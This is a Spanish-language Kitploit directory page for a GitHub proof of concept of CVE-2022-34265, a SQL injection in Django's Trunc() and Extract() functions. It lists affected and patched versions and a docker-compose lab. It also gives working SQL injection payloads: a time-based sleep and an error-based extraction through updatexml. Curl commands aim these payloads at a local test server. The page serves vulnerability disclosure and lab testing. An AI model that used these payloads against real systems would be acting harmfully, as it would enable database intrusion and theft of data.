Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-34265 — PoC para CVE-2022-34265 | Kitploit
Herramientas/GitHubGitHub/zhaoqi99/cve-2022-34265
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubzhaoqi99/cve-2022-34265

CVE-2022-34265

PoC para CVE-2022-34265

Ver Repositorio
42hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-34265

PoC para CVE-2022-34265


Descripción

Se descubrió un problema en Django 3.2 anterior a 3.2.14 y 4.0 anterior a 4.0.6. Las funciones de base de datos Trunc() y Extract() son susceptibles a inyección SQL si se utilizan datos no confiables como valor de kind/lookup_name. Las aplicaciones que restringen la elección del nombre de búsqueda y tipo a una lista segura conocida no se ven afectadas.

Cómo usar

Inicio

root@kitploit:~
git clone https://github.com/ZhaoQi99/CVE-2022-34265.git
cd CVE-2022-34265
docker-compose up -d

Eliminar

root@kitploit:~
docker-compose down

Versiones afectadas

  • Django >= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

Versiones parcheadas

Descargar herramienta
  • Django 3.2.14

  • Django 4.0.6

Verificación

Entorno

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

Payload

  • YEAR FROM start_time)) ;select sleep(5)--

  • YEAR FROM start_time)) and updatexml(1,concat(1,(select name from TEST limit 1),1),1)--

PoC

root@kitploit:~
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20%3Bselect%20sleep(5)--"
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20and%20updatexml(1%2Cconcat(1%2C(select%20name%20from%20TEST%20limit%201)%2C1)%2C1)--"

PD: En el caso de diferentes bases de datos, la existencia de vulnerabilidades es diferente. La vulnerabilidad no existe en el backend de base de datos MYSQL para la función Trunc.

Referencia

  • Reportero: TAKUTO YOSHIKAI (usando PostgreSQL)

  • django/django@877c800

  • django/django@5e2f4dd

  • https://github.com/advisories/GHSA-p64x-8rxx-wf6q

  • CVE-2022-34265 Django SQL 注入漏洞调试分析 - 先知社区